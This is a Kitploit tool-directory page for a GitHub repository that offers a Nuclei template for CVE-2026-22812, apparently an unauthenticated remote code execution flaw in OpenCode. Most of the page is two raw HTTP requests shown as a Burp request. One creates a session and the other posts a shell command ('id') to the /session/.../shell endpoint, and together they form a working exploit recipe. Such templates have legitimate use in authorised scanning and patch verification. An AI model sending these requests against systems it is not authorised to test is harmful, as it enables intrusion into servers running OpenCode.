Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/mad12wader/cve-2026-22812
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationPenetration Testing
GitHubmad12wader/cve-2026-22812

CVE-2026-22812

Nuclei template for detecting and exploiting unauthenticated remote code execution in OpenCode via crafted HTTP requests.

View Repository
7 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-22812

CVE-2026-22812 - OpenCode Unauthenticated RCE Nuclei template for scan.

burp suite request

root@kitploit:~
POST /session HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64)
Content-Type: application/json
Content-Length: 2

{}
root@kitploit:~
POST /session/"id"/shell HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64)
Content-Type: application/json
Content-Length: 44

{
  "agent": "build",
  "command": "id"
}


🔗 reference:

advisories

Download Tool